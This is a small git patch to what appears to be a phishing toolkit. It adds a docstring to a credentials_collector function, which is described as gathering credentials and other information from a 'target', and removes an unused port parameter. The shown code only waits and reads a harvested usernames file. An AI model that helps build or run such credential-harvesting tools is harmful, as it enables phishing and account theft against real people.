From 04d98d28d61f7192091aae501c6c486bb65e9e05 Mon Sep 17 00:00:00 2001 From: sTiKyt Date: Tue, 9 Jun 2020 08:02:36 +0300 Subject: [PATCH] Added doc string for credentials_collector --- Defs/ActionManager/simple_informant.py | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/Defs/ActionManager/simple_informant.py b/Defs/ActionManager/simple_informant.py index c13be0e..e0e04e6 100644 --- a/Defs/ActionManager/simple_informant.py +++ b/Defs/ActionManager/simple_informant.py @@ -103,8 +103,8 @@ def module_loading_message(): # This one just show text.. print(localization.lang_module_loading_message["select_any_mode"]) -def credentials_collector(port): - +def credentials_collector(): + """Collects, writes and returns credentials and additional info gathered from target.""" print(localization.lang_credentials_collector["waiting_for_interaction"]) while True: with open('Server/www/usernames.txt') as creds: